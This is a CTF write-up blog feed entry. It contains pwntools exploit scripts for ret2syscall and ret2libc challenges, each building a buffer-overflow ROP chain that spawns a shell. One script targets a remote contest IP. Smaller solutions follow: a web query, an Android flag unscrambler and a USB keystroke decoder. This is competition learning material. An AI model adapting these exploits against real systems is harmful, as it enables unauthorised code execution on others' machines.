<content type="html"><![CDATA[<h2 id="ret2syscall"><a href="#ret2syscall" class="headerlink" title="ret2syscall"></a>ret2syscall</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>, log_level=<span class="hljs-string">'debug'</span>)<br><br><span class="hljs-comment"># p = process('pwn')</span><br>p = remote(<span class="hljs-string">'58.240.236.231'</span>,<span class="hljs-number">49003</span>)<br><br><br>rdi = <span class="hljs-number">0x40072b</span><br>rsi = <span class="hljs-number">0x400735</span><br>rax = <span class="hljs-number">0x400721</span><br>syscall = <span class="hljs-number">0x400741</span><br>rdx = <span class="hljs-number">0x40073f</span><br>binsh = <span class="hljs-number">0x601048</span><br>payload = <span class="hljs-number">0x48</span>*<span class="hljs-string">b'a'</span>+ p64(rax) + p64(<span class="hljs-number">59</span>) + p64(rdi) + p64(<span class="hljs-number">0x601048</span>) + p64(rsi) + p64(<span class="hljs-number">0</span>) + p64(syscall)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure><span id="more"></span> <h2 id="ret2libc"><a href="#ret2libc" class="headerlink" title="ret2libc"></a>ret2libc</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br><br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)<br>context.log_level = <span class="hljs-string">'debug'</span><br><br><span class="hljs-comment"># p = remote("58.240.236.231",49002)</span><br><br>p = process(<span class="hljs-string">'./pwn123'</span>)<br><br>elf = ELF(<span class="hljs-string">'./pwn123'</span>)<br><br>got_addr = elf.got[<span class="hljs-string">'puts'</span>]<br><br>plt_addr = elf.plt[<span class="hljs-string">'puts'</span>]<br><br>main_addr = elf.symbols[<span class="hljs-string">'vul'</span>]<br><br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(main_addr))<br><br>pop_rdi = <span class="hljs-number">0x0000000000400783</span><br><br>pop_rsi_r15 = <span class="hljs-number">0x0000000000400781</span><br><br>payload = <span class="hljs-string">b'a'</span>*<span class="hljs-number">0xD8</span> + p64(pop_rdi) + p64(got_addr) + p64(plt_addr) + p64(main_addr)<br><span class="hljs-comment"># print(payload)</span><br><br>p.sendline(payload)<br><br><span class="hljs-comment"># p.recvuntil('OK,Good!')</span><br><br>puts_addr=u64(p.recvuntil(<span class="hljs-string">'\x7f'</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>)) <span class="hljs-comment">#将其中的前6个字节(因为这里用的是Little Endian字节序)转换成unsigned long long类型的整数,</span><br><br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(puts_addr))<br><br>libc = LibcSearcher(<span class="hljs-string">"puts"</span>,puts_addr)<br><br>libcsase = puts_addr - libc.dump(<span class="hljs-string">"puts"</span>) <br><br>system_addr = libcsase + libc.dump(<span class="hljs-string">"system"</span>)<br><br>binsh_addr = libcsase + libc.dump(<span class="hljs-string">"str_bin_sh"</span>)<br><br>ret_addr = <span class="hljs-number">0x0000000000400509</span><br><br>payload2 = <span class="hljs-string">b'a'</span>*<span class="hljs-number">0xD8</span> + p64(ret_addr) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)<br><br>p.sendline(payload2)<br><br>p.interactive()<br></code></pre></td></tr></table></figure><h2 id="git"><a href="#git" class="headerlink" title="git"></a>git</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs Shell">?is=flag&flag=flag<br></code></pre></td></tr></table></figure><h2 id="HSAndroid1"><a href="#HSAndroid1" class="headerlink" title="HSAndroid1"></a>HSAndroid1</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python">flag_chars = <span class="hljs-built_in">list</span>(<span class="hljs-string">"0db530c0e9752357b1ae4cf7ea8331ae"</span>)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">14</span>, <span class="hljs-number">0</span>, -<span class="hljs-number">2</span>):<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">12</span>, <span class="hljs-number">0</span>, -<span class="hljs-number">4</span>):<br> temp = flag_chars[j]<br> flag_chars[j] = flag_chars[j - <span class="hljs-number">4</span>]<br> flag_chars[j - <span class="hljs-number">4</span>] = temp<br> j2 = i - <span class="hljs-number">1</span><br> temp2 = flag_chars[j2]<br> flag_chars[i - <span class="hljs-number">1</span>] = flag_chars[i - <span class="hljs-number">2</span>]<br> flag_chars[i - <span class="hljs-number">2</span>] = temp2<br><br>flag = <span class="hljs-string">""</span>.join(flag_chars)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">"Decrypted Flag:"</span>, flag)<br></code></pre></td></tr></table></figure><h2 id="easyusb"><a href="#easyusb" class="headerlink" title="easyusb"></a>easyusb</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">tshark -T json -r usb.pcapng > test.json <br></code></pre></td></tr></table></figure><p>提取流量包,类似这种格式</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs C">usbhid.data<span class="hljs-string">": "</span><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">16</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><span class="hljs-string">"</span><br></code></pre></td></tr></table></figure><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">16</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">08</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">06</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">1f</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">08</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">17</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">0</span>e:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">20</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">1</span>c:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br><span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span>:<span class="hljs-number">00</span><br></code></pre></td></tr></table></figure><p>然后网上找脚本一把嗦</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs Python">mappings = { <span class="hljs-number">0x04</span>:<span class="hljs-string">"A"</span>, <span class="hljs-number">0x05</span>:<span class="hljs-string">"B"</span>, <span class="hljs-number">0x06</span>:<span class="hljs-string">"C"</span>, <span class="hljs-number">0x07</span>:<span class="hljs-string">"D"</span>, <span class="hljs-number">0x08</span>:<span class="hljs-string">"E"</span>, <span class="hljs-number">0x09</span>:<span class="hljs-string">"F"</span>, <span class="hljs-number">0x0A</span>:<span class="hljs-string">"G"</span>, <span class="hljs-number">0x0B</span>:<span class="hljs-string">"H"</span>, <span class="hljs-number">0x0C</span>:<span class="hljs-string">"I"</span>, <span class="hljs-number">0x0D</span>:<span class="hljs-string">"J"</span>, <span class="hljs-number">0x0E</span>:<span class="hljs-string">"K"</span>, <span class="hljs-number">0x0F</span>:<span class="hljs-string">"L"</span>, <span class="hljs-number">0x10</span>:<span class="hljs-string">"M"</span>, <span class="hljs-number">0x11</span>:<span class="hljs-string">"N"</span>,<span class="hljs-number">0x12</span>:<span class="hljs-string">"O"</span>, <span class="hljs-number">0x13</span>:<span class="hljs-string">"P"</span>, <span class="hljs-number">0x14</span>:<span class="hljs-string">"Q"</span>, <span class="hljs-number">0x15</span>:<span class="hljs-string">"R"</span>, <span class="hljs-number">0x16</span>:<span class="hljs-string">"S"</span>, <span class="hljs-number">0x17</span>:<span class="hljs-string">"T"</span>, <span class="hljs-number">0x18</span>:<span class="hljs-string">"U"</span>,<span class="hljs-number">0x19</span>:<span class="hljs-string">"V"</span>, <span class="hljs-number">0x1A</span>:<span class="hljs-string">"W"</span>, <span class="hljs-number">0x1B</span>:<span class="hljs-string">"X"</span>, <span class="hljs-number">0x1C</span>:<span class="hljs-string">"Y"</span>, <span class="hljs-number">0x1D</span>:<span class="hljs-string">"Z"</span>, <span class="hljs-number">0x1E</span>:<span class="hljs-string">"1"</span>, <span class="hljs-number">0x1F</span>:<span class="hljs-string">"2"</span>, <span class="hljs-number">0x20</span>:<span class="hljs-string">"3"</span>, <span class="hljs-number">0x21</span>:<span class="hljs-string">"4"</span>, <span class="hljs-number">0x22</span>:<span class="hljs-string">"5"</span>, <span class="hljs-number">0x23</span>:<span class="hljs-string">"6"</span>, <span class="hljs-number">0x24</span>:<span class="hljs-string">"7"</span>, <span class="hljs-number">0x25</span>:<span class="hljs-string">"8"</span>, <span class="hljs-number">0x26</span>:<span class="hljs-string">"9"</span>, <span class="hljs-number">0x27</span>:<span class="hljs-string">"0"</span>, <span class="hljs-number">0x28</span>:<span class="hljs-string">"\n"</span>, <span class="hljs-number">0x2a</span>:<span class="hljs-string">"[DEL]"</span>, <span class="hljs-number">0X2B</span>:<span class="hljs-string">" "</span>, <span class="hljs-number">0x2C</span>:<span class="hljs-string">" "</span>, <span class="hljs-number">0x2D</span>:<span class="hljs-string">"-"</span>, <span class="hljs-number">0x2E</span>:<span class="hljs-string">"="</span>, <span class="hljs-number">0x2F</span>:<span class="hljs-string">"["</span>, <span class="hljs-number">0x30</span>:<span class="hljs-string">"]"</span>, <span class="hljs-number">0x31</span>:<span class="hljs-string">"\\"</span>, <span class="hljs-number">0x32</span>:<span class="hljs-string">"~"</span>, <span class="hljs-number">0x33</span>:<span class="hljs-string">";"</span>, <span class="hljs-number">0x34</span>:<span class="hljs-string">"'"</span>, <span class="hljs-number">0x36</span>:<span class="hljs-string">","</span>, <span class="hljs-number">0x37</span>:<span class="hljs-string">"."</span> }<br>nums = []<br>keys = <span class="hljs-built_in">open</span>(<span class="hljs-string">'usbdata.txt'</span>)<br><span class="hljs-keyword">for</span> line <span class="hljs-keyword">in</span> keys:<br> <span class="hljs-keyword">if</span> line[<span class="hljs-number">0</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">1</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">3</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">4</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">9</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">10</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">12</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">13</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">15</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">16</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">18</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">19</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">21</span>]!=<span class="hljs-string">'0'</span> <span class="hljs-keyword">or</span> line[<span class="hljs-number">22</span>]!=<span class="hljs-string">'0'</span>:<br> <span class="hljs-keyword">continue</span><br> nums.append(<span class="hljs-built_in">int</span>(line[<span class="hljs-number">6</span>:<span class="hljs-number">8</span>],<span class="hljs-number">16</span>))<br>keys.close()<br>output = <span class="hljs-string">""</span><br><span class="hljs-keyword">for</span> n <span class="hljs-keyword">in</span> nums:<br> <span class="hljs-keyword">if</span> n == <span class="hljs-number">0</span> :<br> <span class="hljs-keyword">continue</span><br> <span class="hljs-keyword">if</span> n <span class="hljs-keyword">in</span> mappings:<br> output += mappings[n]<br> <span class="hljs-keyword">else</span>:<br> output += <span class="hljs-string">'[unknown]'</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">'output :\n'</span> + output)<br><br><span class="hljs-comment"># output :</span><br><span class="hljs-comment"># SEC2ETK3Y</span><br></code></pre></td></tr></table></figure>]]></content>
<summary type="html"><h2 id="ret2syscall"><a href="#ret2syscall" class="headerlink" title="ret2syscall"></a>ret2syscall</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context(arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, os=<span class="hljs-string">&#x27;linux&#x27;</span>, log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br><br><span class="hljs-comment"># p = process(&#x27;pwn&#x27;)</span><br>p = remote(<span class="hljs-string">&#x27;58.240.236.231&#x27;</span>,<span class="hljs-number">49003</span>)<br><br><br>rdi = <span class="hljs-number">0x40072b</span><br>rsi = <span class="hljs-number">0x400735</span><br>rax = <span class="hljs-number">0x400721</span><br>syscall = <span class="hljs-number">0x400741</span><br>rdx = <span class="hljs-number">0x40073f</span><br>binsh = <span class="hljs-number">0x601048</span><br>payload = <span class="hljs-number">0x48</span>*<span class="hljs-string">b&#x27;a&#x27;</span>+ p64(rax) + p64(<span class="hljs-number">59</span>) + p64(rdi) + p64(<span class="hljs-number">0x601048</span>) + p64(rsi) + p64(<span class="hljs-number">0</span>) + p64(syscall)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure></summary>
<category term="ctf" scheme="https://shenshuoyaoyouguangha.github.io/tags/ctf/"/>
<category term="pwn" scheme="https://shenshuoyaoyouguangha.github.io/tags/pwn/"/>
<category term="write up" scheme="https://shenshuoyaoyouguangha.github.io/tags/write-up/"/>
</entry>
</feed>